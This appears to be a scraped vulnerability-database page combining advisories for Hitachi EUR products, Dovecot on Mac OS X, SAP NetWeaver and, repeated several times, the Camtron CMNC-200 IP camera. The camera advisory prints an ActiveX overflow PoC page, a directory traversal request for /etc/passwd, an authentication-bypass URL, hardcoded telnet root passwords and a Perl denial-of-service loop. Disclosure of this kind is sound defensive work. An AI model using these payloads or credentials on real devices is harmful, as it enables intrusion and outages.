VARIoT IoT vulnerabilities database

Unspecified vulnerability in Hitachi EUR Form Client before 05-10 -/D 2010.11.15 and 05-10-CA (* 2) 2010.11.15; Hitachi EUR Form Service before 05-10 -/D 2010.11.15; and uCosminexus EUR Form Service before 07-60 -/D 2010.11.15 on Windows, before 05-10 -/D 2010.11.15 and 07-50 -/D 2010.11.15 on Linux, and before 07-50 -/C 2010.11.15 on AIX; allows remote attackers to execute arbitrary code via unknown attack vectors. Multiple Hitachi products have security vulnerabilities that allow malicious users to compromise user systems. No detailed vulnerability details are provided at present, and an attacker who successfully exploited the vulnerability could execute arbitrary code. Successful exploits will compromise the application and possibly the underlying system. Failed exploit attempts will likely cause denial-of-service conditions. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Hitachi EUR Products Unspecified Code Execution Vulnerability SECUNIA ADVISORY ID: SA42207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42207 RELEASE DATE: 2010-11-16 DISCUSS ADVISORY: http://secunia.com/advisories/42207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in multiple Hitachi products, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an unspecified error. No further information is currently available. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS10-027/index.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue.". Apple Mac OS X is prone to a remote memory-corruption vulnerability that affects Dovecot. Successful exploits may allow attackers to obtain email that was intended for other recipients. This issue affects Mac OS X Server 10.6 to 10.6.5. On systems where Dovecot is configured as a mail server, users may receive mail belonging to other users

SAP NetWeaver is prone to a local privilege-escalation vulnerability. Local attackers may exploit this issue to gain elevated privileges, which can lead to a complete compromise of an affected computer.

Stack-based buffer overflow in a certain ActiveX control for the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to execute arbitrary code via a long string in the first argument to the connect method. The Camtron CMNC-200 is a webcam. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities. Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device. The vulnerable products are listed below: Camtron CMNC-200 Full HD IP Camera running firmware 1.102A-008 is vulnerable. TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Camtron CMNC-200 Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42229 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42229/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42229 RELEASE DATE: 2010-11-18 DISCUSS ADVISORY: http://secunia.com/advisories/42229/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42229/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42229 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Wendel G. Henrique has reported a security issue and some vulnerabilities in Camtron CMNC-200, which can be exploited by malicious people to bypass certain security restrictions, disclose potentially sensitive information, cause a DoS (Denial of Service), and compromise a vulnerable system. 1) Input passed via the URL to the device's web server is not properly verified before being used to read files. This can be exploited to read arbitrary files via directory traversal attacks. For more information: SA42311 The vulnerabilities are reported in version V1.102A-008 / Board ID 66. PROVIDED AND/OR DISCOVERED BY: Wendel G. Henrique, Trustwave's SpiderLabs ORIGINAL ADVISORY: https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The most notable features are full HD support (1920 x 1080), dual streaming, 10x optical zoom, SD card input, input and output alarm sensor, and integration with different DVR solutions. Source: http://www.camtron.co.kr Credit: Wendel G. The vulnerability can be used to set the EIP register, allowing a reliable exploitation. The example code below triggers the vulnerability. <html> <head><title>IPcam POC</title> <script> function Check(){ var bf1 = 'A'; while (bf1.length <= 6144) bf1 = bf1 + 'A'; obj.connect(bf1,"BBBB","CCCC"); } </script> </head> <body onload=" Check();"> <object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32" id="obj"> </object> </html></body> Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 2: Directory Traversal in Camera Web Server CVE: CVE-2010-4231 The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. The following example will display the contents of /etc/passwd: GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 Because the web server runs as root, an attacker can read critical files like /etc/shadow from the web-based administration interface. Authentication is not required for exploitation. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 3: Web Based Administration Interface Bypass CVE: CVE-2010-4232 The CMNC-200 IP Camera has an administrative web interface that does not handle authentication properly. Using a properly formatted request, an attacker can bypass the authentication mechanism. The first example requires authentication: http://www.ipcamera.com/system.html When a second forward slash is placed after the hostname, authentication is not required. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 4: Undocumented Default Accounts CVE: CVE-2010-4233 The CMNC-200 IP Camera has undocumented default accounts on its Linux operating system. These accounts can be used to login via the cameras telnet interface, which cannot be normally disabled. The usernames and passwords are listed below. User: root Password: m User: mg3500 Password: merlin Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 5: Camera Denial of Service CVE: CVE-2010-4234 The CMNC-200 IP Camera has a built-in web server that is vulnerable to denial of service attacks. Sending multiple requests in parallel to the web server may cause the camera to reboot. Requests with long cookie header makes the IP camera reboot a few seconds faster, however the same can be accomplished with requests of any size. The example code below is able to reboot the IP cameras in less than a minute in a local network. #!/usr/bin/perl use LWP::UserAgent; while (1 == 1){ $ua = new LWP::UserAgent; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6)"); $req = HTTP::Request->new(GET => 'http://192.168.10.100'); $req->header(Accept => "text/xml,application/xml,application/xhtml+xml,text/html ;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"); $req->header("Keep-Alive" => 0); $req->header(Connection => "close"); $req->header("If-Modified-Since" => "Mon, 12 Oct 2009 02:06:34 GMT"); $req->header(Cookie => "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); my $res = $ua->request($req); } Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vendor Communication Timeline: 10/7/10 - Vendor contact attempted 10/21/10 - Vendor contact attempted 11/1/10 - Vendor contact attempted 11/11/10 - CVE numbers obtained 11/12/10 - Advisory public release Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

The web-based administration interface on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to bypass authentication via a // (slash slash) at the beginning of a URI, as demonstrated by the //system.html URI. The Camtron CMNC-200 is a webcam. Using the correct format request, the attacker can bypass the authentication mechanism: http://www.ipcamera.com//system.html. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities. Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device. The vulnerable products are listed below: Camtron CMNC-200 Full HD IP Camera running firmware 1.102A-008 is vulnerable. TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. The vulnerability has been confirmed via the //system.html URI. The most notable features are full HD support (1920 x 1080), dual streaming, 10x optical zoom, SD card input, input and output alarm sensor, and integration with different DVR solutions. Source: http://www.camtron.co.kr Credit: Wendel G. Henrique of Trustwave's SpiderLabs CVE: CVE-2010-4230 CVE-2010-4231 CVE-2010-4232 CVE-2010-4233 CVE-2010-4244 Finding 1: Buffer Overflow in ActiveX Control CVE: CVE-2010-4230 The CMNC-200 IP Camera ActiveX control identified by CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable to a stack overflow on the first argument of the connect method. The vulnerability can be used to set the EIP register, allowing a reliable exploitation. The example code below triggers the vulnerability. <html> <head><title>IPcam POC</title> <script> function Check(){ var bf1 = 'A'; while (bf1.length <= 6144) bf1 = bf1 + 'A'; obj.connect(bf1,"BBBB","CCCC"); } </script> </head> <body onload=" Check();"> <object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32" id="obj"> </object> </html></body> Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. The following example will display the contents of /etc/passwd: GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 Because the web server runs as root, an attacker can read critical files like /etc/shadow from the web-based administration interface. Authentication is not required for exploitation. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. The first example requires authentication: http://www.ipcamera.com/system.html When a second forward slash is placed after the hostname, authentication is not required. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 4: Undocumented Default Accounts CVE: CVE-2010-4233 The CMNC-200 IP Camera has undocumented default accounts on its Linux operating system. These accounts can be used to login via the cameras telnet interface, which cannot be normally disabled. The usernames and passwords are listed below. User: root Password: m User: mg3500 Password: merlin Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 5: Camera Denial of Service CVE: CVE-2010-4234 The CMNC-200 IP Camera has a built-in web server that is vulnerable to denial of service attacks. Sending multiple requests in parallel to the web server may cause the camera to reboot. Requests with long cookie header makes the IP camera reboot a few seconds faster, however the same can be accomplished with requests of any size. The example code below is able to reboot the IP cameras in less than a minute in a local network. #!/usr/bin/perl use LWP::UserAgent; while (1 == 1){ $ua = new LWP::UserAgent; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6)"); $req = HTTP::Request->new(GET => 'http://192.168.10.100'); $req->header(Accept => "text/xml,application/xml,application/xhtml+xml,text/html ;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"); $req->header("Keep-Alive" => 0); $req->header(Connection => "close"); $req->header("If-Modified-Since" => "Mon, 12 Oct 2009 02:06:34 GMT"); $req->header(Cookie => "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); my $res = $ua->request($req); } Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vendor Communication Timeline: 10/7/10 - Vendor contact attempted 10/21/10 - Vendor contact attempted 11/1/10 - Vendor contact attempted 11/11/10 - CVE numbers obtained 11/12/10 - Advisory public release Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

The web server on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to cause a denial of service (device reboot) via a large number of requests in a short time interval. The Camtron CMNC-200 is a webcam. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities. Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device. The vulnerable products are listed below: Camtron CMNC-200 Full HD IP Camera running firmware 1.102A-008 is vulnerable. TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Camtron CMNC-200 Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42229 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42229/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42229 RELEASE DATE: 2010-11-18 DISCUSS ADVISORY: http://secunia.com/advisories/42229/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42229/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42229 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Wendel G. Henrique has reported a security issue and some vulnerabilities in Camtron CMNC-200, which can be exploited by malicious people to bypass certain security restrictions, disclose potentially sensitive information, cause a DoS (Denial of Service), and compromise a vulnerable system. 1) Input passed via the URL to the device's web server is not properly verified before being used to read files. This can be exploited to read arbitrary files via directory traversal attacks. 2) The device does not properly restrict access to the administrative web interface. This can be exploited to bypass the authentication mechanism by e.g. appending a second forward slash ("/") after the hostname. 3) Undocumented, hardcoded user accounts can be exploited to e.g. gain access to the device via the telnet interface. 5) The device includes a vulnerable ActiveX control, which can be exploited to compromise a user's system. For more information: SA42311 The vulnerabilities are reported in version V1.102A-008 / Board ID 66. SOLUTION: Restrict and filter network access via a firewall. PROVIDED AND/OR DISCOVERED BY: Wendel G. Henrique, Trustwave's SpiderLabs ORIGINAL ADVISORY: https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Linux installation on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 has a default password of m for the root account, and a default password of merlin for the mg3500 account, which makes it easier for remote attackers to obtain access via the TELNET interface. The Camtron CMNC-200 is a webcam. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities. Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device. The vulnerable products are listed below: Camtron CMNC-200 Full HD IP Camera running firmware 1.102A-008 is vulnerable. TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. The most notable features are full HD support (1920 x 1080), dual streaming, 10x optical zoom, SD card input, input and output alarm sensor, and integration with different DVR solutions. Source: http://www.camtron.co.kr Credit: Wendel G. Henrique of Trustwave's SpiderLabs CVE: CVE-2010-4230 CVE-2010-4231 CVE-2010-4232 CVE-2010-4233 CVE-2010-4244 Finding 1: Buffer Overflow in ActiveX Control CVE: CVE-2010-4230 The CMNC-200 IP Camera ActiveX control identified by CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable to a stack overflow on the first argument of the connect method. The vulnerability can be used to set the EIP register, allowing a reliable exploitation. The example code below triggers the vulnerability. <html> <head><title>IPcam POC</title> <script> function Check(){ var bf1 = 'A'; while (bf1.length <= 6144) bf1 = bf1 + 'A'; obj.connect(bf1,"BBBB","CCCC"); } </script> </head> <body onload=" Check();"> <object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32" id="obj"> </object> </html></body> Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 2: Directory Traversal in Camera Web Server CVE: CVE-2010-4231 The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. The following example will display the contents of /etc/passwd: GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 Because the web server runs as root, an attacker can read critical files like /etc/shadow from the web-based administration interface. Authentication is not required for exploitation. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 3: Web Based Administration Interface Bypass CVE: CVE-2010-4232 The CMNC-200 IP Camera has an administrative web interface that does not handle authentication properly. Using a properly formatted request, an attacker can bypass the authentication mechanism. The first example requires authentication: http://www.ipcamera.com/system.html When a second forward slash is placed after the hostname, authentication is not required. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 4: Undocumented Default Accounts CVE: CVE-2010-4233 The CMNC-200 IP Camera has undocumented default accounts on its Linux operating system. These accounts can be used to login via the cameras telnet interface, which cannot be normally disabled. The usernames and passwords are listed below. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 5: Camera Denial of Service CVE: CVE-2010-4234 The CMNC-200 IP Camera has a built-in web server that is vulnerable to denial of service attacks. Sending multiple requests in parallel to the web server may cause the camera to reboot. Requests with long cookie header makes the IP camera reboot a few seconds faster, however the same can be accomplished with requests of any size. The example code below is able to reboot the IP cameras in less than a minute in a local network. #!/usr/bin/perl use LWP::UserAgent; while (1 == 1){ $ua = new LWP::UserAgent; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6)"); $req = HTTP::Request->new(GET => 'http://192.168.10.100'); $req->header(Accept => "text/xml,application/xml,application/xhtml+xml,text/html ;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"); $req->header("Keep-Alive" => 0); $req->header(Connection => "close"); $req->header("If-Modified-Since" => "Mon, 12 Oct 2009 02:06:34 GMT"); $req->header(Cookie => "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); my $res = $ua->request($req); } Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vendor Communication Timeline: 10/7/10 - Vendor contact attempted 10/21/10 - Vendor contact attempted 11/1/10 - Vendor contact attempted 11/11/10 - CVE numbers obtained 11/12/10 - Advisory public release Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

